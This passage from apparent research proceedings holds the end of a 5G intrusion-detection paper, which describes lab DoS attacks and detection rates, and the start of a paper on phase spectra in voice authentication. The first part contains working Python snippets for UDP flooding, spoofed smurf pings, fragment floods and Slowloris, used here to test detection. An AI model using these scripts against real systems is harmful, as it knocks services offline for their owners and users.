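        # Datagrams aimed at random ports provoke ICMP "port unreachable"
        # replies and exhaust the victim's processing capacity.
        send(IP(dst=target) / UDP(sport=RandShort(), dport=RandShort())
             / Raw(load=bytes(512)), count=count, verbose=0)

    # syn_flood("10.0.0.5", 80)  # run as root inside the virtual NAT network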
ICMP Flood - this type of attack is relatively simple to execute: it involves flooding a victim server with a large number of ICMP (ping) messages, which ultimately leads to a Denial of Service (DoS) (Fig. 9).
Fig. 9. ICMP flood attack
For this attack, the hping3 tool was used to send ICMP echo requests to the victim machine at a high frequency.

LAND Attack
This attack involves a crafted TCP SYN packet whose source IP address and source port are the same as the destination IP address and destination port. When the victim receives this packet, it mistakenly replies to itself, resulting in an infinite loop that leads to a system resource overflow and, ultimately, a Denial of Service (DoS) (Fig. 10).
Fig. 10. LAND attack
To execute this attack, we used the hping3 tool to send packets with identical source and destination IP addresses, as well as identical source and destination ports, to the victim's machine.

HTTP Flood Attack
This attack does not require fake or malformed packets. Instead, it relies on a high volume of legitimate HTTP requests sent by a botnet, which overwhelms the server's resources and leads to a Denial of Service (DoS). For this attack, the TorHammer tool was used to send numerous HTTP headers to the victim's machine (Fig. 11).
Fig. 11. HTTP flood attack
Portmap Attack - Portmapper is an RPC service that runs on both UNIX and Windows machines. As with other reflected DoS attacks, it is possible to generate a large response that is ultimately sent to the victim machine by issuing a simple query with a spoofed source IP address (the victim's IP). To carry out this attack, we used modified rpcinfo software that utilized a spoofed IP address; as a result, all of the RPC responses were transferred to the victim's machine (Fig. 12).
Fig. 12. Portmap attack
Smurf Attack - This is an ICMP-based attack, but more complex than a simple ping flood. A ping packet is sent to a broadcast address with a spoofed source
IP address that matches the victim’s. Every host on the broadcast network replies, so the traffic is amplified and a much larger volume of responses is sent to the victim machine (Fig. 13).
Fig. 13. Smurf attack
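A minimal scapy sketch of the spoofed broadcast ping (addresses are placeholders; the experiment used hping3):

```python
from scapy.all import IP, ICMP, send

VICTIM = "192.0.2.10"       # hypothetical victim address
BROADCAST = "192.0.2.255"   # broadcast address of the reflecting network

# Echo request sent to the broadcast address with the victim's IP as source:
# every host that answers sends its echo reply to the victim, amplifying traffic.
send(IP(src=VICTIM, dst=BROADCAST) / ICMP(), count=1000, verbose=0)
```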
After a sufficient number of such pings, the DoS occurs. The hping3 tool was utilized to execute the attack described: by sending ping requests to the broadcast IP address with the spoofed source IP set to the victim’s IP, all the ICMP reply packets were redirected to the victim’s machine. For the TCP/UDP port scan of the victim’s machine, the Nmap tool was employed. To carry out the SNMP amplification attack, we exploited the SNMP protocol, which is used to manage and gather information from devices such as servers, printers, and switches. The attacker sent a large number of requests with a forged IP address (the victim’s IP) to the SNMP devices, resulting in amplification: the SNMP reply is much larger than the original request. The excess traffic was then directed towards the victim’s machine, causing a DoS. To conduct the SNMP amplification attack, we utilized GetBulk messages in order to amplify the traffic and direct it to the victim’s machine. The SNMP device was sent a spoofed request for the service’s current configuration, and, owing to the spoofed source IP, the answer was returned to the victim’s machine. It is important to note that several attacks from the ‘CICDDoS2021’ dataset, such as the NETBIOS attack, have not been executed yet due to specific project requirements (Fig. 14). Password Brute Forcing - During our tests, we carried out an attack on the FTP server using the password brute-forcing technique, which involves attempting to guess a password by systematically trying letters or words from a dictionary. For this attack, we utilized the Ncrack tool and a word list specifically designed for this purpose. The brute-force attack on the FTP server was carried out using a virtualized network (Fig. 15). IP Fragmentation Attack - IP fragmentation involves splitting a large IP packet into smaller pieces, or fragments, that travel through the network separately and are then reassembled
Fig. 14. SNMP amplification attack
Fig. 15. Password brute forcing attack
at the destination. This is done because every network has a maximum limit on the size of the datagram it can process, known as the Maximum Transmission Unit (MTU). If a server receives a datagram larger than the MTU, the datagram must be split. However, several attacks can exploit the fragmentation mechanism. One of them is the ICMP and UDP fragmentation attack, where the hacker sends fake packets larger than the MTU. Each packet is fragmented, but the destination server cannot reassemble it because it is fake; like a puzzle whose pieces do not fit together, reassembly attempts only waste the server’s resources. This attack results in a denial of service (DoS). Another attack is the TCP fragmentation attack, also known as Teardrop. The objective of these attacks is to disrupt the victim machine’s ability to assemble fragmented packets by manipulating its TCP/IP reassembly mechanisms. By overwhelming the victim server with overlapping packets, a Denial of Service (DoS) is triggered (Fig. 16).
Fig. 16. IP fragmentation attack
The “scapy” Python library was used to perform this attack. POD (Ping of Death) - The maximum size of an IP packet is 65,535 bytes. To bypass this limit, an attacker may send a series of fragmented packets, each smaller than the maximum size (for example, 64,000 bytes). However, when the victim server receives all of the fragments and tries to reassemble them, it ends up with an oversized packet, which can lead to a memory overflow and result in a DoS (Fig. 17).
Fig. 17. POD attack
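A minimal scapy sketch of these fragmentation-based attacks, assuming a hypothetical victim address; the custom script mentioned next worked along similar lines:

```python
from scapy.all import IP, ICMP, Raw, fragment, send

VICTIM = "192.0.2.10"  # hypothetical address

# A large ICMP datagram split into many 8-byte fragments: the victim must
# buffer them all and attempt reassembly.
big = IP(dst=VICTIM) / ICMP() / Raw(b"A" * 60000)
for frag in fragment(big, fragsize=8):
    send(frag, verbose=0)

# A true Ping of Death additionally manipulates fragment offsets so that the
# reassembled datagram would exceed the 65,535-byte IP size limit.
```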
For this attack, a custom script was utilized that sent oversized fragmented packets. Slowloris Attack - This type of attack targets a web service, similar to the Neptune attack. The client sends a large number of HTTP requests that are never completed, and the attacked server keeps the connections open until a denial of service (DoS) occurs (Fig. 18).
Fig. 18. Slowloris attack
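The logic of the attack can be sketched in a few lines of Python (hypothetical target; the experiment used an Nmap script, as noted below):

```python
import socket
import time

HOST, PORT, N_SOCKETS = "192.0.2.10", 80, 200  # hypothetical target

# Open many connections and send only partial HTTP requests.
socks = []
for _ in range(N_SOCKETS):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(4)
    s.connect((HOST, PORT))
    s.send(b"GET / HTTP/1.1\r\nHost: " + HOST.encode() + b"\r\n")
    socks.append(s)

while True:
    for s in socks:
        s.send(b"X-a: b\r\n")  # keep each request unfinished but alive
    time.sleep(10)
```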
An Nmap script was used for this attack. NTP Amplification Attack - NTP is a protocol used to obtain accurate time over the internet. However, some older NTP servers run a monitoring service that counts traffic. The hacker can exploit this by sending a command that requests the list of the last six hundred hosts that connected to the NTP server (‘monlist’), with a spoofed source IP belonging to the victim. As a result, the NTP server sends the list of hosts to the victim’s IP, causing a memory overflow and resulting in a denial of service (DoS) attack (Fig. 19).
Fig. 19. NTP amplification attack
The attack was carried out by sending “monlist” queries to the NTP server with a spoofed source IP. DDoS Attacks Simulation - To simulate DDoS attacks, a laboratory environment was utilized. The attacker hosts received directives from the server through the Ansible software, which uses the SSH protocol to connect to the hosts and execute commands. During the
attacks, an IDS module was deployed on the targeted server to detect and identify any suspicious activity (Fig. 20).
Fig. 20. DDoS attack
6 Experiments We created a small test laboratory with fifty Raspberry Pi devices and the same number of 4G modems with 4G SIM cards. The server ran the proposed IDS. The following attack vectors were implemented against the server: BACK, SMURF, NEPTUNE, NMAP, LAND, POD, BUFFER_OVERFLOW, TEARDROP, ROOTKIT, LOADMODULE, FTP_WRITE, IMAP, MULTIHOP, GUESS_PASSWD, PHF, PROBE, IPSWEEP, SPY, Portmap, PORTSWEEP, MSSQL, SATAN, NetBIOS, LDAP and Syn. It is crucial to secure 5G networks against these attack vectors. Twenty different man-in-the-middle attacks were also implemented. While conducting the attacks, we inspected the generated traffic with a network sniffer and parsed all the relevant parameters for the DoS and NSL-KDD samples with Python. We then transformed the result into the format of the initial datasets and sent all the information to the IDS for analysis (Table 1).
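As an illustration of the parsing step, a minimal scapy sketch that aggregates captured packets into per-flow records, which can then be mapped onto NSL-KDD-style fields (the file name and field names are illustrative assumptions):

```python
from collections import defaultdict
from scapy.all import rdpcap, IP, TCP, UDP

flows = defaultdict(lambda: {"packets": 0, "bytes": 0, "syn": 0})

for pkt in rdpcap("capture.pcap"):  # hypothetical capture file
    if IP not in pkt:
        continue
    proto = "tcp" if TCP in pkt else ("udp" if UDP in pkt else "other")
    key = (pkt[IP].src, pkt[IP].dst, proto)
    flows[key]["packets"] += 1
    flows[key]["bytes"] += len(pkt)
    if TCP in pkt and pkt[TCP].flags & 0x02:  # SYN flag set
        flows[key]["syn"] += 1

# Each 'flows' record can now be written out in the dataset format expected by the IDS.
```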
Table 1. The result of the attacks.

Attack type          Number of attacks   Identified attacks
LAND                 100                 100
BACK                 100                 99
NEPTUNE              100                 98
SMURF                100                 96
POD                  100                 100
TEARDROP             100                 82
FTP_WRITE            100                 86
LOADMODULE           100                 91
BUFFER_OVERFLOW      100                 76
ROOTKIT              100                 62
MULTIHOP             100                 92
SPY                  100                 52
GUESS_PASSWD         100                 100
IPSWEEP              100                 98
PROBE                100                 92
PORTSWEEP            100                 96
NMAP                 100                 98
LDAP                 100                 98
SATAN                100                 82
MSSQL                100                 99
NetBIOS              100                 98
Syn                  100                 100
Portmap              100                 97
Man in the middle    20                  20
7 Results We have developed a new Intrusion Detection System (IDS) focused on 5G attacks and based on machine learning algorithms. The IDS was trained on the NSL-KDD dataset and a DoS/DDoS attacks dataset, using attack vectors to which 5G networks are vulnerable. In addition, we analyzed the MNmap, MiTM, and Battery Drain attacks and identified the factors that contribute to their success. We created a model of protection against these attacks, implemented it, and integrated it into our IDS. The 5G-oriented attacks were implemented, and our IDS was assessed against them; rather good results were obtained.
8 Discussion When conducting attacks on our systems using the proposed test laboratory, we found that our novel IDS protects the system rather well but has some efficiency problems. Efficiency was improved by means of a parallel programming approach, but for real-world use the system must be optimized further. Our team of researchers is working on improving its efficiency. We are also working on collecting and creating new training patterns for the IDS.
9 Conclusions The proposed IDS offers a good level of security, but it still has efficiency problems. The IDS can also protect the system against the most relevant attacks, such as the Battery Drain, MNmap, and MiTM attacks. Global work must be conducted to offer efficient and secure 5G services. This research can assist users in selecting the most effective mitigation strategy. Moreover, the system is well-suited for securing the hardware-based infrastructure of larger organizations, ensuring compliance with even the strictest regulations, such as the European General Data Protection Regulation, through practical and effective implementation. Acknowledgement. This work was supported by the Shota Rustaveli National Science Foundation of Georgia (SRNSFG) [NFR-22-14060].
Results of Experimental Research on Phase Data of Processed Signals in Voice Authentication Systems Mykola Pastushenko(B)
and Yana Krasnozheniuk
Kharkiv National University of Radio Electronics, 14 Nauky Ave., Kharkiv, Ukraine {mykola.pastushenko,yana.krasnozheniuk}@nure.ua
Abstract. The number of cybercrimes in the infocommunications area is growing, and they are becoming more sophisticated. According to the Cisco 2018 Annual Cybersecurity Report, the spread of malicious software (in particular, ransomware), the volume of encrypted web traffic transmitted by cybercriminals, and the number of e-mail threats have all increased. To protect financial and information resources, PIN codes, passwords, and identification cards are used; however, they can be lost or counterfeited. Biometric authentication is now a solution to these problems. Initially, static biometric features (fingerprints, face shape and size, iris and retina patterns) were mostly used, especially in forensic science. Because such features are relatively simple to forge and the amount of analyzed data in access systems is limited, preference is now given to behavioral biometric features, especially the user’s voice signal. Voice systems are preferred by the efficiency/cost criterion. Moreover, voice systems have additional advantages: simplicity, ease of use, difficulty of counterfeiting, remote use through communication channels, an unlimited operational increase in password phrases, and the availability of digital data processing achievements. Unfortunately, the quality characteristics of voice authentication systems are inferior to those of systems using static biometric features, because the formation of a user’s template is based on amplitude and frequency information only. One of the directions for improving the quality indicators of voice authentication systems, according to the authors, is to use the phase information of the registration materials, which has not been sufficiently considered in the scientific literature. The object of research is the process of digital processing of speech signals in voice authentication systems. Research methods include analysis, observation, measurement, modeling and experiment. The paper considers the procedures for forming the phase data of the voice signal and the directions of their use in authentication systems. The feasibility of using phase data, which improves the quality indicators of the considered systems, is demonstrated on the example of processing experimental voice signals. Keywords: amplitude · authentication · voice signal · information · spectrum · phase · pitch frequency
1 Introduction In recent decades, the dynamics of economic growth, the level of well-being of the population, the competitiveness of a state in the world community, the degree of ensuring its national security, and equal integration into the world economy have largely been determined by the achievements of science and the latest technologies. The rapid development and widespread introduction of modern information and communication systems into all spheres of human life testify to the transition of mankind from an industrial society to an information society based on the latest communication means and systems. The number, technical level, and availability of information and communication systems determine the degree of development of a country and its status in the world community and, in the near future, will undoubtedly become a decisive indicator of this status. It is known that the process of informatization of the world community also gives rise to a complex of negative phenomena. Indeed, the high complexity and, at the same time, the vulnerability of all infocommunication systems on which regional, national, and world information spaces are based, as well as the fundamental dependence of state infrastructures on their stability, lead to the emergence of fundamentally new threats. The widespread use of distributed infocommunication systems in all spheres of human activity raises the problem of ensuring information security in such systems. It is known that the protection of financial resources, information data, and computing resources is primarily associated with providing reliable identification and authentication of the user. Many authentication methods, and even more implementations of these methods, are known. However, not all classical solutions to the authentication problem can be used in distributed infocommunication systems, and various types of systems require authentication subsystems with their own unique features. At the same time, the intensive development of computer technology makes it easy to break authentication algorithms that were considered reliable 10–15 years ago. Here we note that in 2019 the total estimated income of fraudsters obtained using bank cards in Ukraine increased from UAH 245.8 million to UAH 361.99 million (up 47.3%), as reported by Olesya Dalnichenko, Deputy Director of the Ukrainian Interbank Association of Members of Payment Systems «EMA». The reason for this is the unreliability of the password protection (PIN codes) of bank cards, which is mainly used in Ukraine. Therefore, continuous and intensive work is now under way in the field of research and development of authentication methods: new algorithms constantly appear, and existing ones are improved, with the aim of ensuring reliable user authentication. The problem of authenticating users who have access to public and personal information resources is becoming more and more urgent. This problem is of particular importance for open, mass telecommunication and information systems. The most promising direction for protecting such systems from unauthorized influences is the use of biometric methods for identifying and authenticating users. At the same time, despite all its attractiveness, the use of biometrics is fraught with a number of serious problems.
The development and implementation of biometric authentication systems were initially associated with the static biometric characteristics of a user (face image, finger papillary pattern, and iris of the eye), which have proven themselves well in forensic science. To date, these
hopes have been dashed, mostly due to the simplicity of counterfeiting the analyzed features. In this regard, a lot of research is now being carried out in the field of using dynamic (behavioral) biometric characteristics of the user. Among these biometric systems, a special place is occupied by voice authentication, which is distinguished by simplicity and convenience and is the best in terms of efficiency/cost. At the same time, like all biometric systems, voice authentication has low quality characteristics. Therefore, many studies are being carried out in the field of voice authentication, as evidenced, for example, by [1–4]. Currently, voice authentication systems (VASs) record and use the amplitude information of the user’s polyharmonic non-stationary voice signal. User authentication is carried out mainly by analyzing the amplitude-frequency spectrum of the registration materials [2]. The main efforts of researchers are focused on developing new procedures, or improving existing ones, for the formation (assessment) of user templates (a set of attributes: pitch frequency, formant data, cepstral coefficients, mel-frequency cepstral coefficients, linear prediction coefficients and their dynamic characteristics, etc.). At the same time, the differences between templates in the domain of amplitude-frequency information are insignificant. Therefore, rather complex decision rules are used. The most popular decision-making procedures are the Gaussian Mixture Model (GMM) and Support Vector Machine (SVM) methods. Artificial neural networks and Hidden Markov Models (HMM) are also used for these purposes. Analysis of the richer experience of digital signal processing in the fields of radio communication and radar shows that, to improve the quality indicators of signal processing, the following are used as a rule [5]: – increasing the signal-to-noise ratio by preliminary processing of the registration materials; – synthesis of higher-quality procedures (for example, taking a priori information into account) for signal selection (parameter estimation); – use of all information parameters of the recorded signals. In this work, we focus on the use of the phase information of the voice signal, which is currently not widely used in existing VASs. The phase information of a voice signal has traditionally been ignored [2], although it has long been known [6] that phase data are more informative. Moreover, using the phase makes it possible to implement the preliminary processing of the registration materials more efficiently, which improves the quality characteristics of the traditional procedures used in modern VASs. The purpose of this work is to study the influence of modern advances in digital information processing on the accuracy of estimating the individual characteristics of the analyzed voice signal in the process of forming a user template. The object of the research is the process of digital processing of voice signals.
2 General Problem Statement An increase in the quality indicators of modern VASs is associated, first of all, with a change in the paradigm of digital processing of the user’s voice signal recordings: the traditional procedures for analyzing the amplitude-frequency spectrum should be supplemented with modern achievements in digital data processing, including algorithms for the formation, preprocessing, and use of the phase data of the user’s voice signals. Thus, at present there is another way to improve the quality indicators of modern VASs, based, first of all, on the full use of the phase information of the user’s voice signal. The reasons for the limited use of phase data in VASs are as follows. It is known that the formation of phase information requires additional computational and algorithmic resources, which were not always available in these applications. It should be noted that earlier, in radar and radio communication, special bulky devices - phase shifters - were used to obtain phase data, and they could not be applied to the digital processing of voice signals. Currently, there are specialized microcircuits and digital signal processors applicable in the field of digital processing of voice signals. In addition, there are specific features of the formation, preprocessing, and use of phase data. It should be noted that there is currently no experience or practice of using the phase of the speech signal for voice authentication tasks. This is confirmed by the fact that only a limited number of works are known in which phase data were used in the processing of speech signals. For example, [7] points out the relevance of using phase information in the processing of speech data, and in [8] the phase was used to refine the frequency characteristics of the processed voice data. In [9], a comparative analysis was carried out of procedures for assessing the phase relationships between the pitch oscillations and overtones of speech signals, which the authors propose to use for the recognition of speech sounds and speaker identification. The above emphasizes the relevance of studies assessing the informativeness of phase data and their influence on the quality characteristics of voice authentication procedures. Phase data can be used in voice authentication in several ways: – to increase the signal-to-noise ratio of the recording materials (a direction well known from radar and radio communication); – to improve the quality of attribute formation for traditionally used templates, for example, pitch frequency, formant information, etc.; – to develop new procedures for forming template elements based on phase data [10].
3 Work-Related Analysis The most complete, detailed, and systematized analysis of scientific works in this area is carried out in [11, 12]: works up to 2012 are considered in [11], and scientific articles from 2012 to 2017 are analyzed in [12]. Below we focus only on selected works in the field of voice authentication.
Obviously, voice identification technologies came to user authentication systems from forensics. The scientific basis for the application of voice identification technology in forensic science has been investigated and discussed in detail in [13]. The general conclusion is that voice identification differs from fingerprints, where the variation is very small, and there is no completely reliable method for determining whether two speech signals come from the same person. In forensic science, speaker recognition can only be probabilistic, i.e., with an indication of the likelihood that two speech signals belong to the same person. Under the conditions of an analog telephone channel, it is sometimes difficult even to recognize gender or age. Due to the small sample of speech signals, the confidence interval for assessing the likelihood that two recordings of speech belong to the same speaker is so large that an unambiguous decision is impossible. The problem of speaker segmentation is quite close to this. Segmentation of speakers in a conversation flow involving different speakers (audio indexing, diarization) is necessary when marking up audio transcripts, teleconferences, radio and television broadcasts, interviews, etc. However, as in forensics, the quality of speaker separation is low and unacceptable for solving the problems of user voice authentication [14]. The individuality of the acoustic characteristics of the voice is determined by three factors: the mechanics of vocal fold vibrations, the anatomy of the vocal tract, and the articulation control system. Acoustically, speaking style is realized in the form of the pitch frequency contour, the duration of words and their segments, the beat rhythm of the segments, the duration of pauses, and the volume level [2, 15]. The attribute space in which a decision about the speaker’s identity is made should be formed taking into account all factors of the speech formation mechanism: the voice source, the resonant frequencies of the vocal tract and their attenuation, and the dynamics of articulation control. In particular, in [15, 16] the following parameters of the voice source are considered: the average pitch frequency, the pitch frequency contour, fluctuations in the pitch frequency, and the shape of the excitation pulse. The spectral characteristics of the vocal tract are described by the spectrum envelope and its average slope, the formant frequencies and their ranges, and the long-term spectrum or cepstrum [16]. In [17], it was shown that the most important factor in the individuality of a voice is the pitch frequency (F0), followed by the formant frequencies, the size of F0 fluctuations, and the slope of the spectrum. In [18], the opinion is expressed that the attributes associated with F0 provide the best separability of voices, followed by the signal energy and the duration of segments. In some works, the formant frequencies are considered the most important factor [19, 20]. In particular, the fourth formant is practically independent of the phoneme type and characterizes the tract [20]. Most works on speaker recognition use the method of cepstral transformation of the voice signal spectrum, which was first proposed in [21]. The cepstrum describes the shape of the signal spectrum envelope, which integrates the characteristics of the excitation sources (vocal, turbulent, and impulse) and the shape of the vocal tract.
In experiments on subjective speaker recognition, it was found that the spectrum envelope strongly affects voice recognition [22]. Therefore, the
use of a certain method for analyzing the spectrum envelope in order to recognize the speaker is justified. Instead of calculating the spectrum of a speech signal using the discrete Fourier transform over a short time interval, the amplitude-frequency characteristic of the signal found from the linear prediction coefficients of speech can also be used [23]. In [24], three informative regions were found: 100–300 Hz (influence of the voice source), 4–5 kHz (pear-shaped cavities), and 6.5–7.8 kHz (possible influence of consonants). A small informative region lies around 1 kHz. Because the overwhelming majority of speaker recognition systems use the same attribute space, for example, in the form of cepstral coefficients and their first and second differences, much attention is paid to developing the decision rules discussed above. The development and application of the GMM method are considered in [25, 26]. The GMM method can be considered an extension of the vector quantization method [26]. Vector quantization is the simplest model in context-independent speaker recognition systems. The Support Vector Machine (SVM) has been actively used in various pattern recognition systems since the publication of the monograph [27]. This method builds a hyperplane in a multidimensional space that separates two classes, for example, the parameters of the target speaker and the parameters of speakers from the reference base. The hyperplane is calculated using not all parameter vectors but only specially selected ones - the support vectors. Since the dividing surface in the original parameter space does not necessarily correspond to a hyperplane, a nonlinear transformation of the space of measured parameters into some attribute space of higher dimension is performed. This nonlinear transformation must satisfy the linear separability requirement in the new feature space. If this condition is met, the dividing hyperplane is constructed using the Support Vector method. Obviously, the success of the Support Vector Machine depends on how well the nonlinear transformation is selected in each specific speaker recognition case. The Support Vector Machine is used for speaker verification, often in combination with GMM or HMM. The Hidden Markov Model (HMM) method, which has proven itself in automatic speech recognition tasks, is also used for speaker recognition [28, 29]. In particular, it is assumed that for short phrases lasting several seconds, the context-dependent approach is best served by phoneme-dependent HMMs rather than by models based on the probabilities of transition from frame to frame with a frame duration of 10–20 ms. The Hidden Markov Model method can be used together with the GMM method. The general conclusion from the analysis of the known literature is that templates for authentication (speaker recognition) are formed on the basis of digital processing of the amplitude-frequency spectrum of the user’s voice signal. At the same time, a more informative parameter of the user’s voice data is ignored, namely, the phase-frequency spectrum. This can be a promising direction for improving the reliability of voice authentication.
4 Methodology and Research Results We analyze the experimental voice signal of a user of the authentication system who pronounced the word “one”. The sampling rate is 64 kHz and the signal-to-noise ratio is over 27 dB. The analyzed voice signal is shown in Fig. 1. First of all, let us explain the sampling frequency used for the analyzed signal. In accordance with the Nyquist–Shannon theorem, the sampling frequency must exceed 2 · fmax. In this case, fmax = 8 kHz is the cutoff frequency of the region in which the attributes of the user’s voice signal are located. In our opinion, the sampling rate should be higher. Let us show this.
Fig. 1. Voice signal of the word “one”
To do this, we compare the characteristics of digital processing of a signal with a sampling rate of 64 kHz with the results obtained by processing the same signal at 32 and 16 kHz. To obtain the potential characteristics, the analyzed signals (with sampling rates of 32 and 16 kHz) are produced by decimating the original signal. This approach eliminates the influence of time-alignment and resampling procedures. The evaluation criterion is the normalized correlation coefficient, and the investigated digital signal processing procedures are:
– the Hilbert transform;
– phase formation procedures;
– spectral analysis.
In this case, the normalized correlation coefficient is recalculated into the signal-to-noise ratio using the known relation [5]. The results are summarized in Table 1.

Table 1. Results of evaluating the influence of sampling rate

Frequency, kHz   Hilbert transform   Phase formation procedures   Spectral analysis
32               0.99 / 20           0.97 / 15                    0.94 / 12
16               0.99 / 20           0.95 / 13                    0.92 / 10
In each cell of Table 1, the first value is the normalized correlation coefficient and the second is the corresponding signal-to-noise ratio in dB. It follows from the results obtained that:
– the required sampling rate depends on the complexity of the digital signal processing procedures;
– the sampling rate should be significantly higher than the frequency determined by the Nyquist theorem.
Moreover, similar studies were carried out for phase-shift-keyed signals [30], where it was found that in the presence of interference the sampling frequency should be approximately equal to 8 · fmax. Therefore, below we analyze a voice signal with a sampling rate of 64 kHz.
Now let us consider the procedures for forming the phase data of the analyzed voice signal; such data are not recorded by the microphone. Phase data are therefore, as a rule, computed programmatically (algorithmically) or, during processing of the registration materials, by special microcircuits (digital signal processors). In this case, the quadrature (imaginary) component of the voice signal must be restored from the recording materials. These procedures rely on the Hilbert transform [5]

y(t) = (1/π) ∫_{−∞}^{+∞} x(τ)/(t − τ) dτ,   (1)
where x(t) is the registered voice signal, y(t) is the quadrature (imaginary) component of the analytic signal, t is the independent time variable, and τ is the variable of integration. Next, using the known relation, the phase of the voice signal can be calculated with the arctangent function

ϕ(t) = arctg(y(t)/x(t)).   (2)
Unfortunately, this function produces angle values in the range from −π/2 to π/2 (see Fig. 2, dashed line).
Fig. 2. Phase signal fragment
To determine the correct value of the phase angle, which for the voice signal varies in the range from 0 to 2 · π, the obtained angle ϕ(t) must be corrected according to the signs of the numerator and denominator of the arctg argument. Otherwise, the phase spectrum will be incorrect. After the correction, we obtain a phase angle that has the shape of a sawtooth signal of unknown period (see Fig. 2, solid line). Unfortunately, the phase angle is not always of good quality. For example, Fig. 3 shows a phase signal with errors that make the phase angle deviate from the sawtooth shape. As shown by the results of previous studies [31], after the formation of phase data it is necessary to perform preprocessing of the registration materials, the quadrature component, and the phase data. This is due to several factors that can lead to erroneous phase values. Among the influencing factors, we highlight the following:
– the polyharmonic nature of the voice signal, which is processed by the Hilbert transform; the latter is oriented toward harmonic stationary data;
– incorrect values when the component y(t) or x(t) in the arctg function equals zero;
Fig. 3. Phase angle with erroneous values
– at small values of the components y(t) or x(t), the latter can be lost in rounding noise.
These factors lead to the appearance of both random errors and abnormal measurements in the sawtooth phase signal. This necessitates preliminary processing of both the voice signal and the phase data. Preprocessing can be based on a priori data on the nature of the change in the phase of the voice signal and improves the quality of attribute formation for both existing and prospective templates. In addition, the behavior of the analytic signal modulus can also be used in the preprocessing procedures. Further, as in well-known modern VASs, we calculate the amplitude-frequency spectrum of the experimental voice signal and analyze it. As indicated above [24], we focus on the low-frequency region (up to 8 kHz), where the user characteristics of the authentication system are located, concentrating initially on the pitch frequency and the associated formant frequencies. It is known that the pitch frequency is an individual characteristic of the speaker. It can vary depending on the emotional coloring of speech, but within fairly narrow limits. In parametric speech coding, it is assumed that the human pitch frequency lies in the range of 80–400 Hz, and most formant frequencies are multiples of F0.
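Before turning to the spectra, the phase-formation steps described above can be sketched in a few lines of Python (a synthetic 243 Hz tone stands in for the recorded word; scipy.signal.hilbert implements Eq. (1), and np.angle already resolves the quadrant ambiguity of Eq. (2), so only the shift to the [0, 2π) range remains):

```python
import numpy as np
from scipy.signal import hilbert

fs = 64_000                        # sampling rate used in the paper
t = np.arange(fs) / fs
x = np.sin(2 * np.pi * 243 * t)    # stand-in for the recorded voice signal

z = hilbert(x)                     # analytic signal x(t) + j*y(t), Eq. (1)
y = z.imag                         # restored quadrature component
phi = np.angle(z)                  # four-quadrant arctangent, range (-pi, pi]
phi = np.mod(phi, 2 * np.pi)       # corrected phase in [0, 2*pi): sawtooth shape
```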
The amplitude-frequency spectrum of the analyzed signal is shown in Fig. 4.
Fig. 4. Short amplitude spectrum of a voice signal of the word “one”
Analysis of the amplitude-frequency spectrum of the user’s real voice signal made it possible to estimate the pitch frequency in the region of 243 Hz. Three formant frequencies are pronounced (see Table 2), while the subsequent ones have a low level of intensity.

Table 2. Characteristics of amplitude spectrum formants

Level, dB        43.4   24.6   18.6   14.2
Frequency, Hz    243    486    776    1025
Now let us investigate the same characteristics for the phase information of the voice signal of the authentication system user. It should be noted that the phase data are processed using the same procedures as the amplitude data. Figure 5 shows the phase spectrum of the corrected phase data, which is considered below.
Fig. 5. Short phase spectrum of the voice signal
The results of processing the formant information of the phase spectrum are presented in Table 3. In this spectrum, six formants can be distinguished, while the seventh and eighth differ insignificantly in energy. The pitch frequency, as in the amplitude spectrum, is 243 Hz. The spectral density level of the selected maxima is several times higher than that of the maxima of the amplitude spectrum, which greatly simplifies the procedure for their isolation. The number of isolated formants in the phase spectrum is one and a half times greater. The above indicates that the phase spectrum of the voice signal is more informative.

Table 3. Characteristics of phase spectrum formants

Level, dB        84.9   76.7   70.3   65     64     62
Frequency, Hz    243    492    738    990    1217   1450
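Continuing the sketch above, such spectral maxima can be isolated automatically, for example with peak picking on the short spectrum (the peak-selection thresholds below are illustrative assumptions, not values from the paper):

```python
import numpy as np
from scipy.signal import find_peaks

# x: voice signal, fs = 64_000 (as in the previous sketch)
spec = 20 * np.log10(np.abs(np.fft.rfft(x * np.hamming(len(x)))) + 1e-12)
freqs = np.fft.rfftfreq(len(x), d=1 / fs)

band = freqs <= 8_000                          # region holding the voice attributes
df = freqs[1] - freqs[0]                       # spectral resolution, Hz
peaks, _ = find_peaks(spec[band],
                      distance=int(150 / df),  # at least ~150 Hz between maxima
                      prominence=6)            # assumed prominence threshold, dB
print(list(zip(freqs[band][peaks], spec[band][peaks])))  # (frequency, level) pairs
```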
Since most current scientific works in the field of voice authentication [12] are devoted to Mel-Frequency Cepstral Coefficients (MFCC), below we focus on these coefficients. Note that MFCCs are usually included as attributes in all user templates. Both the cepstral and the mel-frequency cepstral coefficients are computed according to the scheme shown in Fig. 6, where the following designations are adopted: FFT - signal Fast Fourier Transform block; LOG - spectrum logarithm block; IFFT - Inverse Fast Fourier Transform block.
Fig. 6. General scheme for signal cepstral analysis
Thus, the cepstral and mel-frequency cepstral coefficients are the result of applying the inverse Fourier transform to the logarithmic energy spectrum. These coefficients are computed over signal samples several tens of milliseconds long, selected with some overlap. A number of additional operations, not shown in the above scheme, are also performed. Among them we highlight:
– normalization of the data in the sample and windowing of the results with a Hamming window;
– processing of the spectrum with a comb of triangular filters on the mel scale;
– use of the discrete cosine transform instead of the IFFT.
Figure 7 below shows the results of calculating 15 MFCC coefficients with an overlap of 0.75 in the process of analyzing the amplitude information of the voice signal. The signal included approximately 150 samples (analysis frames).
Fig. 7. Mel-frequency coefficients calculated from amplitude information
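For concreteness, a compact NumPy/SciPy sketch of the pipeline of Fig. 6, assuming the settings reported in the text (1024-count frames, 0.75 overlap, a 40 Hz–8 kHz triangular filterbank on the mel scale, 15 coefficients); the filterbank size of 26 is an illustrative assumption:

```python
import numpy as np
from scipy.fft import dct

def mel(f):          # Hz -> mel
    return 2595 * np.log10(1 + f / 700)

def inv_mel(m):      # mel -> Hz
    return 700 * (10 ** (m / 2595) - 1)

def mfcc(x, fs=64_000, frame=1024, overlap=0.75, n_filt=26, n_coef=15,
         f_lo=40, f_hi=8_000):
    hop = int(frame * (1 - overlap))                      # 256 counts
    n_bins = frame // 2 + 1
    # Triangular filters spaced uniformly on the mel scale.
    edges = inv_mel(np.linspace(mel(f_lo), mel(f_hi), n_filt + 2))
    bins = np.floor((frame + 1) * edges / fs).astype(int)
    fb = np.zeros((n_filt, n_bins))
    for i in range(n_filt):
        l, c, r = bins[i], bins[i + 1], bins[i + 2]
        fb[i, l:c] = (np.arange(l, c) - l) / max(c - l, 1)
        fb[i, c:r] = (r - np.arange(c, r)) / max(r - c, 1)
    coefs = []
    win = np.hamming(frame)
    for start in range(0, len(x) - frame + 1, hop):
        seg = x[start:start + frame]
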